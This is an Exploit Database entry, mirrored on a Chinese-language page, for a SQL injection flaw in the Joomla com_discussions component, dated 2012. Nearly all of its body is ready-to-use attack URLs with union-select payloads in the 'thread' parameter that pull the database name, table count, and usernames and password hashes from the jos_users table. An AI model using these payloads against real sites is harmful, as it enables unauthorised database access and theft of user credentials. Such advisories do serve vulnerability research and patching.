Joomla! Component com_discussions – SQL Injection

• Exploit Database
• 131 阅读

• 作者： Red Security TEAM
  日期： 2012-01-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18380/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # # Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author: Red Security TEAM # Date: 17/01/2012 # Risk: High # Software: http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home: http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi] # # Example : # # 1. [Get Database Name] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1&apos; union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a # 2. [GetTablesName] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1&apos; union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from <code>information_schema</code>.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a # 3. [GetUsername] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1&apos; union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from <code>[Database Name]</code>.jos_users Order by username limit 0,1) --+a # 4. [GetPassword] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1&apos; union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from <code>[Database Name]</code>.jos_users Order by username limit 0,1) --+a #